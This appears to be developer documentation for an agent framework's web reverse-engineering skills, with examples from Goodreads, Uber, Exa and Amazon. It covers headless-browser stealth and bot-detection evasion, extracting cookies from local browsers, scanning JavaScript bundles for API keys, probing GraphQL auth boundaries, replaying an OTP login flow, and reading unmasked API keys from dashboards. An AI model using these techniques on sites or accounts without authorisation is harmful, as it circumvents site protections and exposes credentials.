            "AppleWebKit/537.36 (KHTML, like Gecko) "
            "Chrome/131.0.0.0 Safari/537.36"
        ),
        viewport={"width": 1440, "height": 900},
        locale="en-US",
        timezone_id="America/New_York",
    )
    page = context.new_page()
    page.add_init_script("""
        Object.defineProperty(navigator, 'webdriver', { get: () => false });
    """)

What each setting does

Setting	Why
`--disable-blink-features=AutomationControlled`	Removes the `navigator.webdriver=true` flag that Chromium sets in automation mode
Custom `user_agent`	Default headless UA contains `HeadlessChrome` which is trivially blocked
`viewport`	Default headless viewport is 800x600, which no real user has
`locale` / `timezone_id`	Some bot detectors check for mismatches between locale and timezone
`navigator.webdriver = false`	Belt-and-suspenders override in case the flag leaks through other paths

Real example: Goodreads

Default Playwright against goodreads.com/book/show/4934 returns HTTP 403 with one network request. With stealth settings, the page loads fully with 1400+ requests including 4 AppSync GraphQL calls. See skills/goodreads/public_graph.py discover_via_browser() for the implementation.

CDP Detection Signals — Why Playwright Gets Caught

Even with the stealth settings above, Playwright is still detectable at the Chrome DevTools Protocol (CDP) layer. These signals are invisible in DevTools and unrelated to headers, cookies, or user-agent strings. They matter most during reverse engineering sessions — if a site behaves differently under Playwright than in your real browser, CDP leaks are likely the cause.

Runtime.Enable leak

Playwright calls Runtime.Enable on every CDP session to receive execution context events. Anti-bot systems (Cloudflare, DataDome) detect this with a few lines of in-page JavaScript that only fire when Runtime.Enable is active. This is the single most devastating detection vector — it works regardless of all other stealth measures.

sourceURL leak

Playwright appends //# sourceURL=__playwright_evaluation_script__ to every page.evaluate() call. Any page script can inspect error stack traces and see these telltale URLs. This means your __NEXT_DATA__ extraction, DOM inspection, or any other evaluate() call leaves a fingerprint.

Utility world name

Playwright creates an isolated world named __playwright_utility_world__ that is visible in Chrome’s internal state and potentially to detection scripts.

What to do about it

These leaks are baked into Playwright’s source code — no launch flag or init script fixes them. Two options:

For most RE work: The stealth settings above (flags, UA, viewport, webdriver override) are enough. Most sites don’t check CDP-level signals. If a site seems to behave differently under Playwright, check for these leaks before adding complexity.
For strict sites (Cloudflare Bot Management, DataDome): Use rebrowser-playwright as a drop-in replacement. It patches Playwright’s source to eliminate Runtime.Enable calls, randomize sourceURLs, and rename the utility world. Install: npm install rebrowser-playwright and change your import.

This doesn’t affect production skills. Our architecture uses Playwright only for discovery — production calls go through surf() / HTTPX, which has zero CDP surface. The CDP leaks only matter during reverse engineering sessions where you’re using the browser to investigate a protected site.

When a cookie provider (brave-browser, firefox) extracts cookies for a domain like .uber.com, it returns cookies from ALL subdomains: .uber.com, .riders.uber.com, .auth.uber.com, .www.uber.com. If the skill’s base_url is https://riders.uber.com, sending cookies from .auth.uber.com is wrong — the server picks the wrong csid and redirects to login.

The engine implements RFC 6265 domain matching: when resolving cookies, it extracts the host from connection.base_url and passes it to the cookie provider. The provider filters cookies so only matching ones are returned:

host = "riders.uber.com"

.uber.com          → riders.uber.com ends with .uber.com   → KEEP (parent domain)
.riders.uber.com   → riders.uber.com matches exactly        → KEEP (exact match)
.auth.uber.com     → riders.uber.com doesn't match          → DROP (sibling)
.www.uber.com      → riders.uber.com doesn't match          → DROP (sibling)

This is automatic — skills don’t need to do anything. The filtering happens in the cookie provider (brave-browser/get-cookie.py, firefox/firefox.py) based on the host parameter the engine passes from connection.base_url.

When it matters: Only when a domain has cookies on multiple subdomains with the same cookie name. Most skills are unaffected — Amazon, Goodreads, Chase all have cookies on a single domain. Uber is the first case where it matters.

The old workaround: Before RFC 6265 filtering, the Uber skill had a _filter_cookies() function that deduplicated by cookie name (last occurrence wins). This has been removed — the provider handles it correctly now.

Skills can resolve cookies for any domain without knowing which browser provides them:

from agentos import http

# Resolve cookies — provider discovery is automatic
cookie_header = http.cookies(domain=".uber.com")
resp = http.post(url, cookies=cookie_header, **http.headers(accept="json"))

# Specific account (multiple people logged in on different browsers)
cookie_header = http.cookies(domain=".uber.com", account="uber@contini.co")

http.cookies() uses the same auth resolver as connection-based auth: it tries all installed cookie providers (brave-browser, firefox, etc.), picks the best one, and returns a cookie header string. No hardcoded provider names in skill code.

Playwright integration

capture_network accepts a cookie_domain param that resolves cookies automatically:

# One step — no manual cookie extraction needed
run(skill="playwright", tool="capture_network", params={
    "url": "https://riders.uber.com/trips",
    "cookie_domain": ".uber.com",
    "pattern": "**graphql**",
})

This replaces the old 3-step flow (extract from provider → reformat → inject).

Debugging 400/403 Errors

Symptom	Likely cause	Fix
`403` from CloudFront with a bot-detection HTML page	JA3/JA4 fingerprint blocked	Shouldn’t happen with wreq — if it does, check that the engine is running the wreq build
`400` from CloudFront, body is `"Forbidden"` or short string	WAF rule triggered (header order, ALPN)	Use `waf="cf"` + check `mode=`
`400`, body looks like `"404"`	API Gateway can’t route the request — usually a missing tenant/auth header	Find and add the missing header via `extra=`
`403` for a same-origin API (e.g. `claude.ai`)	Missing `Sec-Fetch-*` headers	Use `waf="cf"` — sets Sec-Fetch-* automatically
`403` from headless Playwright	Default Chromium automation fingerprint	Add stealth settings (see Headless Browser Stealth above)
`429` with “Vercel Security Checkpoint” HTML	Vercel blocks HTTP/2 fingerprint	Use `waf="vercel"` (sets http2=False)
Works in browser, fails in Python regardless	Check for authorization that’s not a JWT	Look for short `Authorization` values in the bundle (namespace, env name, etc.)

Using Playwright to capture exact headers

When you’re stuck, use Playwright to intercept the actual XHR and log all headers (including those added by axios interceptors that aren’t visible in DevTools):

from playwright.sync_api import sync_playwright

def capture_request_headers(url_pattern: str, trigger_url: str) -> dict:
    """Navigate to trigger_url and capture headers from the first request matching url_pattern."""
    captured = {}
    with sync_playwright() as p:
        browser = p.chromium.launch()
        page = browser.new_page()
        page.on("request", lambda req: captured.update(req.headers)
                if url_pattern in req.url else None)
        page.goto(trigger_url)
        page.wait_for_timeout(3000)
        browser.close()
    return captured

Skill File Layout

skills/<skill-name>/
  readme.md            <- agentOS skill descriptor (operations, adapters, etc.)
  requirements.md      <- reverse engineering notes, API docs, findings log
  <skill>.py           <- Python module with all API functions
  icon.svg             <- skill icon

Keep requirements.md as a living document — update it every time you discover a new endpoint, figure out a new header, or resolve a mystery.

Real-World Examples in This Repo

Skill	Service	Transport config	Key learnings
`skills/amazon/`	Amazon (Lightsaber)	`waf="cf", mode="navigate", accept="html"`	Full device hints required, `skip_cookies=` for Siege encryption, session warming. Chrome TLS fingerprint (wreq) required for orders page — Amazon’s WAF uses JA4 + OpenID `max_auth_age=0` per-feature auth gates.
`skills/austin-boulder-project/`	Tilefive / approach.app	`accept="json"` + auth header	CloudFront, `Authorization` = namespace string
`skills/claude/`	claude.ai (Cloudflare)	`waf="cf", accept="json"`, http2=False override	Custom Sec-CH-UA (Brave v146), Cloudflare bypass needs Sec-Fetch-*
`skills/exa/`	dashboard.exa.ai (Vercel)	`waf="vercel", accept="json"`	Vercel checkpoint is purely TLS — cookies and headers irrelevant
`skills/goodreads/`	Goodreads (CloudFront)	`waf="cf", accept="html"`	Public GraphQL via CloudFront, headless Playwright needs stealth settings
`skills/uber/`	Uber (CloudFront)	`accept="json"` + custom headers	RFC 6265 cookie domain filtering — first skill where sibling subdomain cookies caused bugs

Reverse Engineering — Discovery & Data Extraction

Once you can talk to the server (see 1-transport), how do you find and extract structured data?

This is Layer 2 of the reverse-engineering docs:

Layer 1: Transport — 1-transport
Layer 2: Discovery (this file) — finding structured data in pages and bundles
Layer 3: Auth & Runtime — 3-auth
Layer 4: Content — 4-content — HTML scraping when there is no API
Layer 5: Social Networks — 5-social — modeling people, relationships, and social graphs
Layer 6: Desktop Apps — 6-desktop-apps — macOS, Electron, local state, unofficial APIs

Tool: browse capture (bin/browse-capture.py) is the primary discovery tool. It connects to your real browser (Brave/Chrome) via CDP and captures all network traffic with full headers and response bodies. For DOM inspection, use the browser’s own DevTools. See the overview for the full toolkit.

Why not Playwright? Playwright’s bundled Chromium has a detectable TLS fingerprint. Sites like Amazon and Cloudflare-protected services reject it. CDP to a real browser produces authentic fingerprints and uses existing sessions. See Transport.

Next.js + Apollo Cache Extraction

Many modern sites (Goodreads, Airbnb, etc.) use Next.js with Apollo Client. These pages ship a full serialized Apollo cache in the HTML — structured entity data that you can parse without scraping visible HTML.

Where to find it

<script id="__NEXT_DATA__" type="application/json">{ ... }</script>

Inside that JSON:

__NEXT_DATA__
  .props.pageProps
  .props.pageProps.apolloState        <-- the gold
  .props.pageProps.apolloState.ROOT_QUERY

How Apollo normalized cache works

Apollo stores GraphQL results as a flat dictionary keyed by entity type and ID. Related entities are stored as {"__ref": "Book:kca://book/..."} pointers.

import json, re

def extract_next_data(html: str) -> dict:
    match = re.search(
        r'<script id="__NEXT_DATA__" type="application/json">(.*?)</script>',
        html, re.S,
    )
    if not match:
        raise RuntimeError("No __NEXT_DATA__ found")
    return json.loads(match.group(1))

def deref(apollo: dict, value):
    """Resolve Apollo __ref pointers to their actual objects."""
    if isinstance(value, dict) and "__ref" in value:
        return apollo.get(value["__ref"])
    return value

Extraction pattern

next_data = extract_next_data(html)
apollo = next_data["props"]["pageProps"]["apolloState"]
root_query = apollo["ROOT_QUERY"]

# Find the entity by its query key
book_ref = root_query['getBookByLegacyId({"legacyId":"4934"})']
book = apollo[book_ref["__ref"]]

# Dereference related entities
work = deref(apollo, book.get("work"))
primary_author = deref(apollo, book.get("primaryContributorEdge", {}).get("node"))

What you typically find in the Apollo cache

Entity type	Common fields
Books	title, description, imageUrl, webUrl, legacyId, details (isbn, pages, publisher)
Contributors	name, legacyId, webUrl, profileImageUrl
Works	stats (averageRating, ratingsCount), details (originalTitle, publicationTime)
Social signals	shelf counts (CURRENTLY_READING, TO_READ)
Genres	name, webUrl
Series	title, webUrl

The Apollo cache often contains more data than the visible page renders. Always dump and inspect apolloState before assuming you need to make additional API calls.

Real example: Goodreads

See skills/goodreads/public_graph.py functions load_book_page() and map_book_payload() for a complete implementation that extracts 25+ fields from the Apollo cache without any GraphQL calls.

JS Bundle Scanning

SPAs embed everything in their JavaScript bundles — config values, API keys, custom endpoints, and auth flow logic. Scanning bundles is one of the highest- value reverse engineering techniques. It works without login, reveals hidden endpoints that network capture misses, and exposes the exact contracts the frontend uses.

Two levels of bundle scanning

Level 1: Config extraction — find API keys, endpoints, tenant IDs. Standard search for known patterns.

Level 2: Endpoint and flow discovery — find custom API endpoints that aren’t in the standard framework (e.g. /api/verify-otp), understand what parameters they accept, and how the frontend processes the response. This is how you crack custom auth flows.

General pattern

import re, httpx

def scan_bundles(page_url: str, search_terms: list[str]) -> dict:
    """Fetch a page, extract all JS bundle URLs, scan each for search terms."""
    with httpx.Client(http2=False, follow_redirects=True, timeout=30) as client:
        html = client.get(page_url).text

        # Extract all JS chunk URLs (Next.js / Turbopack pattern)
        js_urls = list(set(re.findall(
            r'["\'](/_next/static/[^"\' >]+\.js[^"\' >]*)', html
        )))

        results = {}
        for url in js_urls:
            js = client.get(f"{page_url.split('//')[0]}//{page_url.split('//')[1].split('/')[0]}{url}").text
            for term in search_terms:
                if term.lower() in js.lower():
                    # Extract context around the match
                    idx = js.lower().find(term.lower())
                    context = js[max(0, idx-100):idx+200]
                    results.setdefault(term, []).append({
                        "chunk": url[-40:],
                        "size": len(js),
                        "context": context,
                    })
        return results

Config patterns to search for

What	Search terms
API keys	`apiKey`, `api_key`, `X-Api-Key`, `widgetsApiKey`
GraphQL endpoints	`appsync-api`, `graphql`
Tenant / namespace	`host.split`, `subdomain`
Cognito credentials	`userPoolId`, `userPoolClientId`
Auth endpoints	`AuthFlow`, `InitiateAuth`, `cognito-idp`

Custom endpoint patterns to search for

What	Search terms
Custom auth flows	`verify-otp`, `verify-code`, `verify-token`, `confirm-code`
Hidden API routes	`fetch(`, `/api/`
Token construction	`callback/email`, `hashedOtp`, `rawOtp`, `token=`
Form submission handlers	`submit`, `handleSubmit`, `onSubmit`

How we cracked Exa’s custom OTP flow

Exa’s login page uses a custom 6-digit OTP system built on top of NextAuth. The standard NextAuth callback failed with error=Verification. Scanning the JS bundles revealed the actual flow:

# Search terms that found the hidden endpoint
results = scan_bundles("https://auth.exa.ai", ["verify-otp", "verify-code", "callback/email"])

In a 573KB chunk, this surfaced:

fetch("/api/verify-otp", {method: "POST", headers: {"Content-Type": "application/json"},
  body: JSON.stringify({email: e.toLowerCase(), otp: r})})
// → response: {email, hashedOtp, rawOtp}
// → constructs: token = hashedOtp + ":" + rawOtp
// → redirects to: /api/auth/callback/email?token=...&email=...

This revealed the entire auth flow — custom endpoint, request/response shape, and token construction — all from static JS analysis.

Multi-environment configs

Many sites ship all environment configs in the same bundle. Goodreads ships four AppSync configurations with labeled environments:

{"graphql":{"apiKey":"da2-...","endpoint":"https://...appsync-api...amazonaws.com/graphql","region":"us-east-1"},"showAds":false,"shortName":"Dev"}
{"graphql":{"apiKey":"da2-...","endpoint":"https://...appsync-api...amazonaws.com/graphql","region":"us-east-1"},"showAds":false,"shortName":"Beta"}
{"graphql":{"apiKey":"da2-...","endpoint":"https://...appsync-api...amazonaws.com/graphql","region":"us-east-1"},"showAds":true,"shortName":"Preprod"}
{"graphql":{"apiKey":"da2-...","endpoint":"https://...appsync-api...amazonaws.com/graphql","region":"us-east-1"},"showAds":true,"shortName":"Prod"}

Pick the right one by looking for identifiers like shortName, showAds: true, publishWebVitalMetrics: true, or simply taking the last entry (Prod is typically last in webpack build output).

The “Authorization is the namespace” pattern

Some APIs use the Authorization header not for a JWT but for a tenant namespace extracted from the subdomain at runtime:

Jl = () => host.split(".")[0]   // -> "boulderingproject"
headers: { Authorization: Jl(), "X-Api-Key": widgetsApiKey }

If you see Authorization values that seem too short to be JWTs, look for the function that generates them near the axios/fetch client factory in the bundle.

Real examples

Goodreads: skills/goodreads/public_graph.py discover_from_bundle() — extracts Prod AppSync config from _app chunk
Austin Boulder Project: skills/austin-boulder-project/abp.py — API key and namespace from Tilefive bundle

When JS bundle scanning reveals what endpoint gets called but not what happens with the result (e.g. a client-side token construction), you need to see the actual values the browser produces. The Navigation API interceptor is the key technique.

The problem

Client-side JS often does: fetch → process response → set window.location.href. Once the navigation fires, the page is gone and you can’t inspect the URL. Network capture only catches the fetch, not the outbound navigation. And the processing logic is buried in minified closures you can’t easily call.

The solution

Modern Chrome exposes the Navigation API. You can intercept navigation attempts, capture the destination URL, and prevent the actual navigation — all with a single evaluate call:

evaluate { script: "navigation.addEventListener('navigate', (e) => { window.__intercepted_nav_url = e.destination.url; e.preventDefault(); }); 'interceptor installed'" }

Then trigger the action (click a button, submit a form), and read the captured URL:

click { selector: "button#submit" }
evaluate { script: "window.__intercepted_nav_url" }

The URL contains whatever the client-side JS constructed — tokens, hashes, callback parameters — fully assembled and ready to replay with HTTPX.

When to use this

Situation	Technique
Button click makes a `fetch()` call	Fetch interceptor (see 3-auth)
Button click causes a page navigation	Navigation API interceptor
Form does a native POST (page reloads)	Inspect the `<form>` action + inputs
JS constructs a URL and redirects	Navigation API interceptor

Real example: Exa OTP verification

The Exa auth page’s “VERIFY CODE” button calls /api/verify-otp, gets back {hashedOtp, rawOtp}, then does window.location.href = callback_url_with_token. The Navigation API interceptor captured the full callback URL, revealing the token format is {bcrypt_hash}:{raw_code}.

This technique turned a “Playwright required” flow into a fully HTTPX-replayable one. See NextAuth OTP flow.

Combining with fetch interception

For complete visibility, install both interceptors before triggering an action:

// Capture all fetch calls AND navigations
window.__cap = { fetches: [], navigations: [] };

// Fetch interceptor
const origFetch = window.fetch;
window.fetch = async (...args) => {
  const r = await origFetch(...args);
  const c = r.clone();
  window.__cap.fetches.push({
    url: typeof args[0] === 'string' ? args[0] : args[0]?.url,
    status: r.status,
    body: (await c.text()).substring(0, 3000),
  });
  return r;
};

// Navigation interceptor
navigation.addEventListener('navigate', (e) => {
  window.__cap.navigations.push(e.destination.url);
  e.preventDefault();
});

Read everything after: evaluate { script: "JSON.stringify(window.__cap)" }

Read the Source

When bundle scanning and interception give you the what but not the why, go read the library’s source code. This is especially valuable for well-known frameworks (NextAuth, Supabase, Clerk, Auth0) where the source is on GitHub.

Why this matters

Minified bundle code tells you what the client does. The library source tells you what the server expects. These are two halves of the same flow.

Example: NextAuth email callback

Bundle scanning revealed Exa calls /api/auth/callback/email?token=.... But what does the server do with that token? Reading the NextAuth callback source revealed the critical line:

token: await createHash(`${paramToken}${secret}`)

The server SHA-256 hashes token + NEXTAUTH_SECRET and compares with the database. This told us the token format must be stable and deterministic — it can’t be a random value. Combined with the Navigation API interception that showed token = hashedOtp:rawOtp, we had the complete picture.

When to read the source

Signal	Action
Standard framework (NextAuth, Supabase, etc.)	Read the auth callback handler source
Custom error messages (e.g. `error=Verification`)	Search the library source for that error string
Token/hash format is unclear	Read the token verification logic
Framework does something “impossible”	The source always reveals how

Where to find it

NextAuth:   github.com/nextauthjs/next-auth/tree/main/packages/core/src
Supabase:   github.com/supabase/auth
Clerk:      github.com/clerk/javascript
Auth0:      github.com/auth0/nextjs-auth0

Search the repo for the endpoint path (e.g. callback/email) or error message (e.g. Verification) to find the relevant handler quickly.

GraphQL Schema Discovery via JS Bundles

Production GraphQL endpoints almost never allow introspection queries. But the frontend JS bundles contain every query and mutation the app uses.

Technique: scan all JS chunks for operation names

import re

def discover_graphql_operations(html: str, base_url: str) -> set[str]:
    """Find all GraphQL operation names from the frontend JS bundles."""
    chunks = re.findall(r'(/_next/static/chunks/[a-zA-Z0-9/_%-]+\.js)', html)
    operations = set()
    for chunk in chunks:
        js = fetch(f"{base_url}{chunk}")
        # Find query/mutation declarations
        for m in re.finditer(r'(?:query|mutation)\s+([A-Za-z_]\w*)\s*[\(\{]', js):
            operations.add(m.group(1))
    return operations

What this finds

On Goodreads, scanning 18 JS chunks revealed 38 operations:

Queries (public reads): getReviews, getSimilarBooks, getSearchSuggestions, getWorksByContributor, getWorksForSeries, getComments, getBookListsOfBook, getSocialSignals, getWorkCommunityRatings, getWorkCommunitySignals, …

Queries (auth required): getUser, getViewer, getEditions, getSocialReviews, getWorkSocialReviews, getWorkSocialShelvings, …

Mutations: RateBook, ShelveBook, UnshelveBook, TagBook, Like, Unlike, CreateComment, DeleteComment

Extracting full query strings

Once you know the operation name, extract the full query with its variable shape:

def extract_query(js: str, operation_name: str) -> str | None:
    idx = js.find(f"query {operation_name}")
    if idx == -1:
        return None
    snippet = js[idx:idx + 3000]
    depth = 0
    for i, c in enumerate(snippet):
        if c == "{": depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0:
                return snippet[:i + 1].replace("\\n", "\n")
    return None

This gives you copy-pasteable GraphQL documents you can replay directly via HTTP POST.

Real example: Goodreads

See skills/goodreads/public_graph.py for the full set of proven GraphQL queries including getReviews, getSimilarBooks, getSearchSuggestions, getWorksForSeries, and getWorksByContributor.

Public vs Auth Boundary Mapping

After discovering operations, you need to determine which ones work anonymously (with just the public API key) and which require user session auth.

Technique: probe each operation and classify the error

Send each discovered operation to the public endpoint and classify the response:

Response	Meaning
`200` with `data`	Public, works anonymously
`200` with `errors: ["Not Authorized to access X on type Y"]`	Partially public — the operation works but specific fields are viewer-scoped. Remove the blocked field and retry.
`200` with `errors: ["MappingTemplate" / VTL error]`	Requires auth — the AppSync resolver needs session context to even start
`403` or `401`	Requires auth at the transport level

AppSync VTL errors as a signal

AWS AppSync uses Velocity Template Language (VTL) resolvers. When a public request hits an auth-gated resolver, you get a distinctive error:

{
  "errorType": "MappingTemplate",
  "message": "Error invoking method 'get(java.lang.Integer)' in [Ljava.lang.String; at velocity[line 20, column 55]"
}

This means: “the resolver tried to read user context from the auth token and failed.” It reliably indicates the operation needs authentication.

Field-level authorization

GraphQL auth on AppSync is often field-level, not operation-level. A getReviews query might work but including viewerHasLiked returns:

{ "message": "Not Authorized to access viewerHasLiked on type Review" }

The fix: remove the viewer-scoped field from your query. The rest works fine publicly.

Goodreads boundary scorecard

Operation	Public?	Notes
`getSearchSuggestions`	Yes	Book search by title/author
`getReviews`	Yes	Except `viewerHasLiked` and `viewerRelationshipStatus`
`getSimilarBooks`	Yes
`getWorksForSeries`	Yes	Series book listings
`getWorksByContributor`	Yes	Needs internal contributor ID (not legacy author ID)
`getUser`	No	VTL error — needs session
`getEditions`	No	VTL error — needs session
`getViewer`	No	Viewer-only by definition
`getWorkSocialShelvings`	Partial	May need session for full data

Heterogeneous Page Stacks

Large sites migrating to modern frontends have mixed page types. You need to identify which pages use which stack and adjust your extraction strategy.

How to identify the stack

Signal	Stack
`<script id="__NEXT_DATA__">` in HTML	Next.js (server-rendered, may have Apollo cache)
GraphQL/AppSync XHR traffic after page load	Modern frontend with GraphQL backend
No `__NEXT_DATA__`, classic `<div>` structure, `<meta>` tags	Legacy server-rendered HTML
`window.__INITIAL_STATE__` or similar	React SPA with custom state hydration

Goodreads example

Page type	Stack	Extraction strategy
Book pages (`/book/show/`)	Next.js + Apollo + AppSync	`__NEXT_DATA__` for main data, GraphQL for reviews/similar
Author pages (`/author/show/`)	Legacy HTML	Regex scraping
Profile pages (`/user/show/`)	Legacy HTML	Regex scraping
Search pages (`/search`)	Legacy HTML	Regex scraping

Strategy: use structured extraction where available, fall back to HTML only where the site hasn’t migrated yet. As the site migrates pages, move your extractors to match.

Legacy HTML Scraping

When a page has no structured data surface, regex scraping is the fallback.

Principles

Prefer specific anchors (IDs, class names, itemprop attributes) over positional matching
Use re.S (dotall) for multi-line HTML patterns
Extract sections first, then parse within the section to reduce false matches
Always strip and unescape HTML entities

Section extraction pattern

def section_between(html: str, start_marker: str, end_marker: str) -> str:
    start = html.find(start_marker)
    if start == -1:
        return ""
    end = html.find(end_marker, start)
    return html[start:end] if end != -1 else html[start:]

When to stop scraping

If you find yourself writing regex patterns longer than 3 lines, consider:

Is there a __NEXT_DATA__ payload you missed?
Does the page make XHR calls you could replay directly?
Can you use a headless browser to get the rendered DOM instead?

HTML scraping should be the strategy of last resort, not the first attempt.

Real-World Examples in This Repo

Skill	Discovery technique	Reference
`skills/exa/`	JS bundle scanning for custom `/api/verify-otp` endpoint + Navigation API interception for token format + reading NextAuth source for server-side verification logic	`exa.py`, nextauth.md
`skills/goodreads/`	Next.js Apollo cache + AppSync GraphQL + JS bundle scanning	`public_graph.py`
`skills/austin-boulder-project/`	JS bundle config extraction (API key + namespace)	`abp.py`
`skills/claude/`	Session cookie capture via Playwright	`claude-login.py`

Reverse Engineering — Auth & Credentials

How to log into things, get API keys, and store credentials — for any web service.

This is Layer 3 of the reverse-engineering docs:

Layer 1: Transport — 1-transport
Layer 2: Discovery — 2-discovery
Layer 3: Auth & Credentials (this file)
- nextauth.md — NextAuth.js / Auth.js deep dive
- workos.md — WorkOS auth pattern
Layer 4: Content — 4-content
Layer 5: Social Networks — 5-social
Layer 6: Desktop Apps — 6-desktop-apps

How web auth works

Every web login — from a 2005 PHP app to a 2026 Next.js SPA — does the same three things:

You prove who you are (type a password, click a link, enter a code)
The server gives you a cookie (session token, JWT, whatever)
You send that cookie with every request

That’s it. The mechanism varies — form POSTs, fetch calls, OAuth redirects — but the end result is always a cookie in your browser.

The two submission patterns

When you click “Submit” on a login form, one of two things happens:

Form POST (the classic). The browser sends an HTML form POST, the server responds with a redirect (302), and the browser follows it. Cookies get set along the way. This is the oldest pattern on the web and still used everywhere, including modern frameworks like NextAuth.

Browser: POST /login { email, password }
Server:  302 → /dashboard  (Set-Cookie: session=abc123)
Browser: GET /dashboard (Cookie: session=abc123)

Fetch/XHR (the SPA way). JavaScript makes an async request, the page stays loaded, and the response is handled in JS. The page might update without a full navigation.

JS:      fetch('/api/login', { method: 'POST', body: { email, password } })
Server:  200 { token: "abc123" }
JS:      stores token, updates UI

Both are straightforward. When reverse engineering, you just need to figure out which one a site uses, then replay it.

Cookies

A cookie is a name-value pair the server sends with Set-Cookie and the browser sends back with every request. The attributes control where and how:

Attribute	What it means	HTTP client impact
`HttpOnly`	JS can’t read it	Doesn’t affect `agentos.http` (only matters in browsers)
`Secure`	HTTPS only	Use `https://` URLs
`SameSite=Lax`	Sent on navigations, not cross-site POSTs	`agentos.http` sends it normally
`Domain=.example.com`	Works on all subdomains	Important when auth and dashboard are on different subdomains. The engine uses RFC 6265 domain matching to filter cookies by `host` from `connection.base_url`
Expiry	Session (until browser close) or persistent (date)	`agentos.http` doesn’t care — just send the cookie

Cross-domain cookies: When auth lives at auth.exa.ai and the dashboard at dashboard.exa.ai, the session cookie is scoped to .exa.ai so both subdomains can use it. When extracting cookies, always check the domain — .exa.ai works everywhere, auth.exa.ai only works on auth.

CSRF tokens

Sites protect against forged requests by requiring a CSRF token — a secret value the server generates and the client must include in form submissions.

The pattern is always the same:

Fetch the token (from an endpoint, a meta tag, a hidden form field, or a cookie)
Include it in your POST (as a form field, header, or both)

csrf = client.get("/api/auth/csrf").json()["csrfToken"]
client.post("/api/auth/signin/email", data={"email": email, "csrfToken": csrf})

The token and cookie must come from the same request. If you fetch the token with one HTTPX client and try to use it with another, the server will reject it because the CSRF cookie doesn’t match.

Where to find CSRF tokens during discovery:

# API endpoint (NextAuth)
evaluate { script: "fetch('/api/auth/csrf').then(r=>r.json()).then(d=>JSON.stringify(d))" }

# Meta tag
evaluate { script: "document.querySelector('meta[name=csrf-token]')?.content" }

# Hidden form fields
evaluate { script: "JSON.stringify(Array.from(document.querySelectorAll('input[type=hidden]')).map(i => ({name: i.name, value: i.value.substring(0,20)+'...'})))" }

The credential bootstrap

This is the end-to-end flow for getting credentials from a web dashboard. Every dashboard skill follows these five steps.

1. Navigate to the dashboard

Go to the dashboard URL (not the auth URL directly). The dashboard redirects to auth with the right callback URL.

get_webpage { url: "https://dashboard.example.com", wait_until: "domcontentloaded" }
# → redirects to https://auth.example.com/?callbackUrl=https://dashboard.example.com/

If it lands on a Cloudflare challenge page, that’s fine — the Playwright browser solves it automatically and you get a cf_clearance cookie.

2. Figure out how to log in

Check what login methods are available:

evaluate { script: "fetch('/api/auth/providers').then(r=>r.json()).then(d=>JSON.stringify(Object.keys(d)))" }

Inspect the form:

inspect { selector: "form" }

This tells you:

Email + code → usually fully replayable with agentos.http (see below)
Email + password → replay entirely with agentos.http
Google/GitHub OAuth → Playwright for the consent screen, then cookies
SSO (WorkOS, Okta) → see vendor guides

Try agentos.http first. Many email+code flows that appear browser-only are actually fully replayable. The key technique is scanning the JS bundles for custom verification endpoints (e.g. /api/verify-otp) and using the Navigation API interceptor to discover token formats. See Discovery: JS Bundle Scanning and Discovery: Navigation API Interception.

from agentos import http

# Example: Exa email+code login — no browser needed
# 1. Trigger code email
with http.client() as client:
    csrf_token = client.get(f"{AUTH_BASE}/api/auth/csrf").json()["csrfToken"]
    client.post(f"{AUTH_BASE}/api/auth/signin/email", data={"email": email, "csrfToken": csrf_token, ...})

    # 2. Agent reads code from email (Gmail, etc.)

    # 3. Verify code via custom endpoint
    resp = client.post(f"{AUTH_BASE}/api/verify-otp", json={"email": email, "otp": code})
    data = resp.json()  # {hashedOtp, rawOtp}
    token = f"{data['hashedOtp']}:{data['rawOtp']}"

    # 4. Hit the standard callback with the constructed token
    client.get(f"{AUTH_BASE}/api/auth/callback/email?token={token}&email={email}&callbackUrl=...")
    # → session cookie is now set on the client

Fall back to Playwright only for flows that genuinely require a browser (Google OAuth consent screens, CAPTCHAs, or complex multi-step redirects). Use type (not fill) for input fields on React forms.

If the login involves a verification code from email, the agent checks email between steps.

4. Grab the cookies

cookies { domain: ".example.com" }

You want the session cookie (usually next-auth.session-token, session, auth_token, etc.) and optionally cf_clearance for Cloudflare.

Validate it works:

from agentos import http

with http.client(cookies={"next-auth.session-token": token}) as client:
    session = client.get("https://dashboard.example.com/api/auth/session").json()
    assert session.get("user"), "Session invalid"

5. Hit the dashboard APIs

Navigate to the API keys page and capture what the frontend calls:

capture_network { url: "https://dashboard.example.com/api-keys", pattern: "**/api/**", wait: 5000 }

This typically reveals endpoints for:

Listing API keys
Team/org info (rate limits, billing, usage)
User profile

Always read the full API response. Dashboards mask values in the UI (showing 9d2e4b••••••) but the API often returns them in full. Exa’s /api/get-api-keys returns the complete API key as the id field — the UI masking is purely client-side.

6. Store credentials

Return them via __secrets__ so the engine stores them securely:

return {
    "__secrets__": [{
        "issuer": "api.example.com",
        "identifier": email,
        "item_type": "api_key",
        "label": "Example API Key",
        "source": "example-skill",
        "value": {"key": api_key},
        "metadata": {
            "masked": {"key": api_key[:6] + "••••••••"},
            "dashboard_url": "https://dashboard.example.com/api-keys",
        },
    }],
    "__result__": {"status": "authenticated", "identifier": email},
}

The engine writes to the credential store, creates an account entity on the graph, and strips __secrets__ before the response reaches the agent.

Observing network traffic

Three tools, each for a different situation.

`capture_network` — what the page calls on load

Navigate to a URL and record all fetch/XHR traffic for a few seconds.

capture_network { url: "https://dashboard.exa.ai/api-keys", pattern: "**/api/**", wait: 5000 }

Use this to discover dashboard APIs, auth endpoints, and data shapes. Good patterns to filter with:

"**/api/**"         REST APIs
"**graphql**"       GraphQL endpoints
"**appsync-api**"   AWS AppSync

Fetch interceptor — what a button click triggers

When you need to see what happens after a user interaction (like clicking “Create Key”), inject this before clicking:

evaluate { script: "window.__cap = []; const orig = window.fetch; window.fetch = async (...a) => { const req = { url: typeof a[0]==='string' ? a[0] : a[0]?.url, method: a[1]?.method||'GET' }; const r = await orig(...a); const c = r.clone(); req.status = r.status; req.body = (await c.text()).substring(0,3000); window.__cap.push(req); return r; }; 'ok'" }

click { selector: "button#create-key" }

evaluate { script: "JSON.stringify(window.__cap)" }

Form inspection — what a form POST sends

If the fetch interceptor captures nothing but the browser navigated somewhere new, the form did a native POST (full page navigation). Just inspect the form to see what it sends:

evaluate { script: "JSON.stringify(Array.from(document.querySelectorAll('form')).map(f => ({ action: f.action, method: f.method, inputs: Array.from(f.querySelectorAll('input')).map(i => ({ name: i.name, type: i.type, value: i.value ? '(has value)' : '(empty)' })) })))" }

This gives you the action URL, the method, and all input fields including hidden ones (CSRF tokens, honeypots).

